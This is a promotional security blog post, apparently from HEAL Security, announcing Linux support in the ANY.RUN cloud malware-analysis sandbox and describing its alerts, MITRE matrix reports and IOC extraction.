Hello there! You might be familiar with the ANY.RUN sandbox, a kind of cloud-based playground for peering into the minds of malware. Or, if not, buckle up, my fellow cybersecurity experts, as you’re in for some exciting news from the ever-evolving world of malware analysis.
Recently, the ANY.RUN sandbox has been given an update. And guess what? Now it includes support for Linux, expanding its capabilities to provide a secure and isolated environment for investigating malware and conducting threat studies. With Linux becoming increasingly targeted by hackers, this addition goes a long way in helping bolster our cybersecurity strategies.
If you’re a security analyst, think of this as having an extra muscle to flex at threats. This update allows you to mirror and probe destructive actions in Linux-oriented systems, enhancing your ability to perceive and respond to threats.
Now, here’s why this matters. Linux is like a beehive for hackers. It’s sophisticated, widely used in organizational IT setups, and, ironically, that’s what makes it attractive to these cyber miscreants. Consider this: according to our buddies over at IBM, in 2020 the number of Linux-related malware families shot up by 40%. Shocking, right? But that’s not all. A breached Linux-based cloud computing platform also opens the floodgates to colossal resources, hence the appeal to hackers.
Taking on Linux malware analysis is no small feat. The folks at ANY.RUN understand this, which is why they’ve extended their platform’s Windows sample analysis capabilities to Linux. With interactive analysis, they’re giving analysts the power to spot undetected threats swiftly, even in the face of zero-day vulnerabilities.
Their real-time alerts are like a third eye, ensuring no critical information slips under your radar, and their concise post-task reports maintain easy access to all relevant data. There’s also the MITRE Matrix report feature that’s like your personalized guide to identifying threats based on suspicious behaviors spotted in the Linux sandbox task.
By now, you’re probably wondering about the nitty-gritty of running a new task on Linux on ANY.RUN. Well, it’s simple. When you’re setting up a new task, select Linux as your OS from the drop-down menu. If you choose this, your sample would be running on Ubuntu.
With the new features, not only does it provide real-time information from malware analysis, it also does away with the need for deep-dive reverse engineering expertise. It essentially slices and dices complex Linux malware, letting you extract the needed IOCs pronto. The results are yours to comprehend instantly, letting you tread swiftly without needing to switch context.
And here’s the cherry on top, it’s both efficient and wallet-friendly. With preconfigured Linux virtual machines (VMs) that gather IOCs, you can skip the weeks of infrastructure setup time.
So, all you folks using Linux – cloud hosts and regular users alike – take heed that your system is a prime target. And while Linux is more secure than some of its counterparts, malware can still find its way in. But fret not, as we now have smarter ways to keep the threats at bay.
Just remember, as long as there is malware, our mission continues. And with advanced tools like ANY.RUN, we’re more equipped than ever to investigate incidents and streamline threat analysis. As the saying goes, knowledge is power!
by Morgan Phisher | HEAL Security
